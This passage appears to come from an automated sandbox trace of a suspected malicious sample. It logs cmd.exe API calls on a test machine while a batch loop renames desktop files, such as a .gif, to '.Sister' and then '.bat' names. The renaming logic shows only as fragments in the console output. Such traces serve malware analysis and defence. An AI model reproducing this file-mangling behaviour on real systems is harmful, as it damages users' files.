lpMode=0xa6cf4fe058) returned 1 [0167.620] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.620] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9486600*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9486600*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0167.704] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0167.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.705] GetFileType (hFile=0x50) returned 0x2 [0167.705] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0167.705] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0167.777] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.777] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0167.883] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0167.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.883] GetFileType (hFile=0x50) returned 0x2 [0167.883] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0167.883] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0167.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0167.956] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0168.035] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0168.313] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0168.314] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0168.314] malloc (_Size=0xffce) returned 0x21ed95a0040 [0168.314] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0168.314] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0168.314] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0168.314] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0168.314] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0168.314] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0168.314] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0168.314] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0168.314] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0168.314] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0168.314] ??_V@YAXPEAX@Z () returned 0x1 [0168.314] GetProcessHeap () returned 0x21ed8c70000 [0168.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937ed40 [0168.314] GetProcessHeap () returned 0x21ed8c70000 [0168.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ed40, Size=0x130) returned 0x21ed937ed40 [0168.315] GetProcessHeap () returned 0x21ed8c70000 [0168.315] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ed40) returned 0x130 [0168.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.315] malloc (_Size=0xffce) returned 0x21ed95a0040 [0168.315] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0168.315] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.315] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed95a0040, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.317] ??_V@YAXPEAX@Z () returned 0x1 [0168.317] GetProcessHeap () returned 0x21ed8c70000 [0168.317] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62810 [0168.317] GetProcessHeap () returned 0x21ed8c70000 [0168.317] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937e450 [0168.317] GetProcessHeap () returned 0x21ed8c70000 [0168.317] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e450, Size=0x130) returned 0x21ed937e450 [0168.317] GetProcessHeap () returned 0x21ed8c70000 [0168.317] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e450) returned 0x130 [0168.317] malloc (_Size=0xffce) returned 0x21ed95a0040 [0168.317] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0168.317] GetProcessHeap () returned 0x21ed8c70000 [0168.317] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64c80 [0168.317] GetProcessHeap () returned 0x21ed8c70000 [0168.317] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9485480 [0168.317] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0168.318] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0168.318] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0168.318] GetLastError () returned 0x2 [0168.318] GetProcessHeap () returned 0x21ed8c70000 [0168.318] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9486ad0 [0168.318] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9486ae0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0168.318] SetErrorMode (uMode=0x0) returned 0x0 [0168.318] SetErrorMode (uMode=0x1) returned 0x0 [0168.318] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed95a0040, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0168.318] SetErrorMode (uMode=0x0) returned 0x1 [0168.318] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0168.318] GetProcessHeap () returned 0x21ed8c70000 [0168.318] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9483260 [0168.318] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0168.318] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0168.319] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0168.319] GetLastError () returned 0x2 [0168.319] ??_V@YAXPEAX@Z () returned 0x1 [0168.319] malloc (_Size=0xffce) returned 0x21ed95a0040 [0168.319] ??_V@YAXPEAX@Z () returned 0x21ed95a0040 [0168.319] malloc (_Size=0xffce) returned 0x21ed95b0020 [0168.319] ??_V@YAXPEAX@Z () returned 0x21ed95b0020 [0168.319] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0168.319] GetLastError () returned 0x2 [0168.319] _get_osfhandle (_FileHandle=2) returned 0x54 [0168.319] GetFileType (hFile=0x54) returned 0x2 [0168.319] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0168.319] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0168.415] _get_osfhandle (_FileHandle=2) returned 0x54 [0168.415] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0168.491] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0168.491] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0168.491] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0168.587] longjmp () [0168.587] ??_V@YAXPEAX@Z () returned 0x1 [0168.587] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839d0900, ftCreationTime.dwHighDateTime=0x1d5eb77, ftLastAccessTime.dwLowDateTime=0xedc064b0, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xedc064b0, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0xd83f, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="PUKKYc6CLfNruQwL4y5O.gif", cAlternateFileName="")) returned 1 [0168.587] GetProcessHeap () returned 0x21ed8c70000 [0168.587] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e9f0, Size=0x36a) returned 0x21ed9496ac0 [0168.588] GetProcessHeap () returned 0x21ed8c70000 [0168.588] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9496ac0) returned 0x36a [0168.589] GetProcessHeap () returned 0x21ed8c70000 [0168.589] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d67fd0 [0168.590] GetProcessHeap () returned 0x21ed8c70000 [0168.590] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d67fd0, Size=0x30) returned 0x21ed8d67fd0 [0168.590] GetProcessHeap () returned 0x21ed8c70000 [0168.590] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67fd0) returned 0x30 [0168.590] GetProcessHeap () returned 0x21ed8c70000 [0168.590] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68010 [0168.590] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bdf0 [0168.591] ??_V@YAXPEAX@Z () returned 0x1 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68010, Size=0x200) returned 0x21ed8d68010 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68010) returned 0x200 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68220 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68220, Size=0x290) returned 0x21ed8d68220 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68220) returned 0x290 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d684c0 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d684c0, Size=0x30) returned 0x21ed8d684c0 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.591] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d684c0) returned 0x30 [0168.591] GetProcessHeap () returned 0x21ed8c70000 [0168.592] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68500 [0168.592] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0168.592] GetProcessHeap () returned 0x21ed8c70000 [0168.592] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7be40 [0168.592] ??_V@YAXPEAX@Z () returned 0x1 [0168.592] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0168.592] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d64f80 [0168.592] FindClose (in: hFindFile=0x21ed8d64f80 | out: hFindFile=0x21ed8d64f80) returned 1 [0168.592] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65100 [0168.592] FindClose (in: hFindFile=0x21ed8d65100 | out: hFindFile=0x21ed8d65100) returned 1 [0168.592] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8e3dfb0d, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x8e3dfb0d, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d651c0 [0168.593] FindClose (in: hFindFile=0x21ed8d651c0 | out: hFindFile=0x21ed8d651c0) returned 1 [0168.593] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839d0900, ftCreationTime.dwHighDateTime=0x1d5eb77, ftLastAccessTime.dwLowDateTime=0xedc064b0, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xedc064b0, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0xd83f, dwReserved0=0x4, dwReserved1=0x80, cFileName="PUKKYc6CLfNruQwL4y5O.gif", cAlternateFileName="PUKKYC~1.GIF")) returned 0x21ed8d64f20 [0168.593] FindClose (in: hFindFile=0x21ed8d64f20 | out: hFindFile=0x21ed8d64f20) returned 1 [0168.593] _wcsnicmp (_String1="PUKKYC~1.GIF", _String2="PUKKYc6CLfNruQwL4y5O.gif", _MaxCount=0x18) returned 72 [0168.593] malloc (_Size=0x1ff9c) returned 0x21ed95c0000 [0168.594] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0168.595] GetProcessHeap () returned 0x21ed8c70000 [0168.595] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7be90 [0168.595] ??_V@YAXPEAX@Z () returned 0x1 [0168.595] ??_V@YAXPEAX@Z () returned 0x1 [0168.595] GetProcessHeap () returned 0x21ed8c70000 [0168.595] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68500, Size=0x200) returned 0x21ed8d68500 [0168.595] GetProcessHeap () returned 0x21ed8c70000 [0168.595] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68500) returned 0x200 [0168.595] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0168.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0168.595] GetFileType (hFile=0x50) returned 0x2 [0168.595] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0168.595] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0168.668] _get_osfhandle (_FileHandle=1) returned 0x50 [0168.668] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0168.743] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0168.743] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0168.744] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0168.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0168.744] GetFileType (hFile=0x50) returned 0x2 [0168.744] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0168.744] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0168.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0168.889] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0169.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.029] GetFileType (hFile=0x50) returned 0x2 [0169.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0169.029] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0169.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.225] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d67fe0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d67fe0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0169.302] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"PUKKYc6CLfNruQwL4y5O.gif\" \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" ") returned 62 [0169.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.302] GetFileType (hFile=0x50) returned 0x2 [0169.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0169.302] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0169.375] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.375] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0169.487] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0169.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.487] GetFileType (hFile=0x50) returned 0x2 [0169.487] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0169.487] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0169.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.600] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0169.718] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0169.718] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.718] GetFileType (hFile=0x50) returned 0x2 [0169.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0169.719] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0169.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0169.920] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0170.229] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0170.229] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.229] GetFileType (hFile=0x50) returned 0x2 [0170.229] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0170.229] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0170.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.352] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0170.438] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0170.438] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.438] GetFileType (hFile=0x50) returned 0x2 [0170.438] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0170.438] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0170.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.510] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0170.587] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.587] GetFileType (hFile=0x50) returned 0x2 [0170.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0170.587] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0170.657] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.657] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d684d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d684d0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0170.730] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.bat\" ") returned 62 [0170.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.730] GetFileType (hFile=0x50) returned 0x2 [0170.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0170.730] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0170.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.800] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0170.911] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0170.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.911] GetFileType (hFile=0x50) returned 0x2 [0170.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0170.912] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0170.990] _get_osfhandle (_FileHandle=1) returned 0x50 [0170.990] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, 